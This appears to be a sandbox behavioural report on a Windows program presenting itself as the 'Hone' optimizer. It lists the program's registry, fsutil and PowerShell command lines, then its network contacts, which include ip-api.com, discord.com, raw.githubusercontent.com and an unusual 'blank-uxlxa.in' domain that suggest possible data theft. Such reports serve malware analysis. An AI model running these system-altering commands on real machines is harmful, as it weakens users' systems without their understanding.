C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:12X /n /m " >:"
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "MemoryTweaks" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\fsutil.exe
fsutil behavior set memoryusage 2
C:\Windows\system32\fsutil.exe
fsutil behavior set mftzone 2
C:\Windows\system32\fsutil.exe
fsutil behavior set disablelastaccess 1
C:\Windows\system32\fsutil.exe
fsutil behavior set encryptpagingfile 0
C:\Windows\system32\fsutil.exe
fsutil behavior set disable8dot3 1
C:\Windows\system32\fsutil.exe
fsutil behavior set disablecompression 1
C:\Windows\system32\fsutil.exe
fsutil behavior set disabledeletenotify 0
C:\Windows\system32\cmd.exe
cmd /V:ON /C @echo off
C:\Windows\system32\mode.com
Mode 65,16
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f
C:\Windows\system32\control.exe
control.exe desk.cpl,Settings,@Settings
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" ms-settings:display
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f
C:\Windows\system32\cmd.exe
cmd /V:ON /C @echo off
C:\Windows\system32\mode.com
Mode 65,16
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-uxlxa.in | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:50062 | tcp | |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| NL | 20.103.156.88:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:50118 | tcp | |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:50124 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:50128 | tcp | |
